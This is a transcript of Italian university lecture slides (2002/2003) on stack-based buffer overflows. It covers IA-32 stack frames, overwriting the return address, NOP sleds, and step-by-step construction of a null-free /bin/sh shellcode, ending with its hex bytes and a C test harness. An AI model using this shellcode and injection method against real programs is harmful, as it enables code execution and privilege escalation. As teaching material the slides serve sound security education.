La presentazione è in caricamento. Aspetta per favore

La presentazione è in caricamento. Aspetta per favore

ICT security 2002/2003 1 Buffer Overflows (stack based) Alberto Ornaghi Lorenzo Cavallaro.

Presentazioni simili


Presentazione sul tema: "ICT security 2002/2003 1 Buffer Overflows (stack based) Alberto Ornaghi Lorenzo Cavallaro."— Transcript della presentazione:

1 ICT security 2002/2003 1 Buffer Overflows (stack based) Alberto Ornaghi Lorenzo Cavallaro

2 ICT security 2002/20032 Table of contents Introduzione allIA-32 Introduzione allIA-32 Problema Problema Code Injection Code Injection Shellcode Shellcode

3 ICT security 2002/2003 3 Introduzione

4 4 Record di attivazione Return Address - E lindirizzo a cui viene ceduto il controllo una volta terminata lesecuzione della funzione. Base Pointer - E il contenuto del registro EBP al momento della chiamata alla funzione. Rappresenta il puntatore al record di attivazione precedente che deve essere ripristinato al termine della funzione ret address base pointer automatic variables... high low

5 ICT security 2002/20035 Sullo stack int foo(int a, int b) { int i = 5; return (a + b) * i; } int main(int argc, char **argv) { int c = 3, d = 4, e = 0; e = foo(c, d); printf(e = %d\n, e); } 4 3 high low stack ret address base pointer 5

6 ICT security 2002/20036 RDA innestati int foo(int a, int b) { bar(a, b); } int bar(int a, int b) {... } int main(int argc, char **argv) { foo(c, d); } d c high low b a ret address base pointer ret address base pointer

7 ICT security 2002/20037 Registri della CPU EIP: instruction pointer puntatore allistruzione successiva EBP: frame pointer puntatore riferito alla base del record di attivazione (fisso) ESP: stack pointer puntatore riferito al top della stack (mobile) d c high low ret address base pointer b ret address base pointer a

8 ICT security 2002/20038 Prologo ed epilogo Prologo: Prologo: push %ebp(salva %ebp) mov %ebp, %esp(sposta %esp) Epilogo Epilogo leave(ripristina %esp e %ebp) ret(ripristina %eip)

9 ICT security 2002/20039 Variabili automatiche Int foo(int a, int b) { int i, j; char buf[9]; … } Lallineamento di default sullo stack e a double word (4 byte) I buffer vengono estesi per essere allineati a 4 byte b a high low ret address base pointer i j buffer pad

10 ICT security 2002/2003 10 Problema

11 11 Situazione normale int foo(int a, int b) { int i, j; char buf[9]; i = 5; j = 123; strcpy(buf, sicurezza); } b a high low ret address base pointer 5 123 s i c u r e z z a 05 00 00 00 7B 00 00 00 61 72 65 7A 7A 73 69 63 75

12 ICT security 2002/200312 Situazione critica int foo(int a, int b) { int i, j; char buf[9]; i = 5; j = 123; strcpy(buf, sicurezzabcde); } b a high low ret address base pointer 5 e s i c u r e z z a b c d 05 00 00 00 65 00 00 00 61 62 63 64 72 65 7A 7A 73 69 63 75 Buffer Overflow

13 ICT security 2002/200313 Situazione molto critica int foo(int a, int b) { int i, j; char buf[9]; i = 5; j = 123; strcpy(buf, sicurezzaaaabbbbcccceeeeffff); } b a high low ret address base pointer 5 123 63 63 62 62 61 61 72 65 7A 7A 73 69 63 75 65 65 64 64 Ret Overflow Segmentation fault... EIP = 0x65656565

14 ICT security 2002/2003 14 Code Injection

15 ICT security 2002/200315 Modifica del ret address b a high low 0xbffffcab 0xbffffca7 0xbffffc8b 8B FC FF BF 90 90 int a = 3; int b = 5; int e; e = foo(a, b); printf(%d\n, e); ret address base pointer ret addr

16 ICT security 2002/200316 Guessing del ret addr (1) Non esiste un algoritmo efficiente per trovare il ret addr Procediamo empiricamente tenendo conto che: il S.O. usa memoria virtuale e paginazione 0xbfffffff 0xbffffffb 0xbffffff7 0xbffffff3 0xbfffffff 0xbffffffb 0xbffffff7 0xbffffff3 Processo 1Processo 2 high low

17 ICT security 2002/200317 Guessing del ret addr (2) env argv RDA main RDA foo high low Limmagine dei processi e cosi strutturata: Limmagine dei processi e cosi strutturata: RDA bar offset fisso offset variabile

18 ICT security 2002/200318 Guessing del ret addr (3) lo stack pointer (esp) e una buona base dalla quale poter togliere (o aggiungere) un offset; quindi lindirizzo cosi ottenuto e un buon candidato come retaddr del programma vulnerabile. buf[4] buf[0] a esp ret addr b offset (8) high low

19 ICT security 2002/200319 Problematiche Le funzioni di copia per le stringhe (strcpy, gets, ecc) copiano fino al primo NULL byte (terminatore per le stringhe). Le funzioni di copia per le stringhe (strcpy, gets, ecc) copiano fino al primo NULL byte (terminatore per le stringhe). Il codice iniettato non dovra contenere NULL byte Il codice iniettato non dovra contenere NULL byte code[] = \xeb\x2a\x5f\xc6\x47\x07\x00\x89\x7f\x08\xc7\x47; strcpy(buf, code); buf = \xeb\x2a\x5f\xc6\x47\x07

20 ICT security 2002/200320 Facilitazioni Per aumentare la probabilita di trovare il ret addr e possibile preparare una pista di atterraggio di NOP (0x90) (istruzione macchina che non fa nulla). Per aumentare la probabilita di trovare il ret addr e possibile preparare una pista di atterraggio di NOP (0x90) (istruzione macchina che non fa nulla). ret address 90 90 CODE INJE 90 90... ret addr allargato CTED

21 ICT security 2002/200321 Struttura del buffer Il buffer che verra iniettato nel programma vulnerabile avra una struttura simile a questa: Il buffer che verra iniettato nel programma vulnerabile avra una struttura simile a questa: NOP EXECUTABE CODERET ADDR code[] = \x90\x90\x90...\xeb\x2a...\x8d\xfc\xff\xbf; attenzione !!

22 ICT security 2002/200322 Considerazioni... Il buffer potrebbe essere troppo piccolo per contenere un codice utile Il buffer potrebbe essere troppo piccolo per contenere un codice utile Lo stack potrebbe non essere eseguibile Lo stack potrebbe non essere eseguibile Il code puo essere messo in qualsiasi punto della memoria (non solo sullo stack, e non solo nel buffer) Il code puo essere messo in qualsiasi punto della memoria (non solo sullo stack, e non solo nel buffer)

23 ICT security 2002/2003 23 Lo shellcode

24 ICT security 2002/200324 exec.c #include int main() { char *shell[] = { "/bin/sh", NULL }; execve(shell[0], shell, NULL); }

25 ICT security 2002/200325 Disasm main push %ebp mov %esp, %ebp sub $0x18, %esp movl $0x809cd00, 0xfffffff8(%ebp) mov 0xfffffff8(%ebp), %eax and 0xfffffff0, %esp mov %eax, 0xfffffff0(%ebp) push %eax push $0x0 movl $0x0, 0xfffffffc(%ebp) lea 0xfffffff0(%ebp), %eax mov 0xfffffffc(%ebp), %edx push %eax mov %edx, 0xfffffff4(%ebp) push 0xfffffff0(%ebp) call 0x804cab0 $0x0 ($0x809cd00)$0x809cd00 base pointer $0x809cd00

26 ICT security 2002/200326 Disasm execve mov $0x8(%ebp), %edi mov $0xc(%ebp), %ecx mov $0x10(%ebp), %edx mov %edi, %ebx mov $0xb, %eax int $0x80 $0x0 ($0x809cd00)$0x809cd00 ret address base address

27 ICT security 2002/200327 registri mov $0x8(%ebp), %edi mov $0xc(%ebp), %ecx mov $0x10(%ebp), %edx mov %edi, %ebx mov $0xb, %eax int $0x80 eax = 0xb ebx = /bin/sh ecx = (/bin/sh, NULL) edx = (0x0) sh-2.03# id uid=0(root) gid=0(root) groups=0(root)

28 ICT security 2002/200328 Lo shellcode eax = 0xb ebx = /bin/sh ecx = (/bin/sh, NULL) edx = (0x0) Supponiamo di avere lindirizzo sullo stack di /bin/sh nel registro %edi movb $0x0, 0x7(%edi)#terminazione movl %edi, 0x8(%edi)#indirizzo movl $0x0, 0xc(%edi)#NULL lea 0xc(%edi), %edx#envp NULL lea 0x8(%edi), %ecx#array mov %edi, %ebx#/bin/sh mov $0xb, %eax int $0x80#syscall

29 ICT security 2002/200329 Lo shellcode edi = /bin/sh Come troviamo lindirizzo sullo stack di /bin/sh ??? jmp string_addr after_jmp: pop %edi [...] string_addr: call after_jmp.string \"/bin/sh\" Shellcode pagina precedente

30 ICT security 2002/200330 Opcode dello shellcode jmp string_addr # 0xeb 0x1e after_jmp: pop %edi # 0x5f movb $0x0, 0x7(%edi) # 0xc6 0x47 0x07 0x00 movl %edi, 0x8(%edi) # 0x89 0x7f 0x08 movl $0x0, 0xc(%edi) # 0xc7 0x47 0x0c 0x00 0x00 0x00 lea 0xc(%edi), %edx # 0x8d 0x57 0x0c lea 0x8(%edi), %ecx # 0x8d 0x4f 0x08 mov %edi, %ebx # 0x89 0xfb mov $0xb, %eax # 0xb8 0x0b 0x00 0x00 0x00 int $0x80 # 0xcd 0x80 string_addr: call after_jmp # 0xe8 0xd1 0xff 0xff 0xff.string \"/bin/sh\"

31 ICT security 2002/200331 Eliminazione null bytes movl $0x0b, %eax { xorl %eax, %eax movb %0x0b, %al movb $0x00, 0xc(%edi) { xorl %eax, %eax movb %al, 0xc(%edi)

32 ICT security 2002/200332 Shellcode finale jmp string_addr # 0xeb 0x18 after_jmp: pop %edi # 0x5f xorl %eax, %eax # 0x31 0xc0 movb %al, 0x7(%edi) # 0x88 0x47 0x07 movl %edi, 0x8(%edi) # 0x89 0x7f 0x08 movl %eax, 0xc(%edi) # 0x89 0x47 0x0c lea 0xc(%edi), %edx # 0x8d 0x57 0x0c lea 0x8(%edi), %ecx # 0x8d 0x4f 0x08 mov %edi, %ebx # 0x89 0xfb movb $0xb, %al # 0xb0 0x0b int $0x80 # 0xcd 0x80 string_addr: call after_jmp # 0xe8 0xde 0xff 0xff 0xff.string \"/bin/sh\"

33 ICT security 2002/200333 Testing dello shellcode char shellcode[] = "\xeb\x1d\x5f\x31\xc0\x88\x47\x07\x89\x7f\x08\x89 \x47\x0c\x8d\x57\x0c\x8d\x4f\x08\x89\xfb\xb0\x0b \xcd\x80\xe8\xde\xff\xff\xff/bin/sh"; int main() { void (*f)(void) = (void (*)(void))shellcode; f(); } sh-2.03# id uid=0(root) gid=0(root) groups=0(root)

34 ICT security 2002/200334 –Lorenzo Cavallaro –Lorenzo Cavallaro –Alberto Ornaghi –Alberto Ornaghi Mailing list del corso (per domande tecniche) Mailing list del corso (per domande tecniche) sikurezza-dsi@yahoogroups.comsikurezza-dsi-subscribe@yahoogroups.com


Scaricare ppt "ICT security 2002/2003 1 Buffer Overflows (stack based) Alberto Ornaghi Lorenzo Cavallaro."

Presentazioni simili


Annunci Google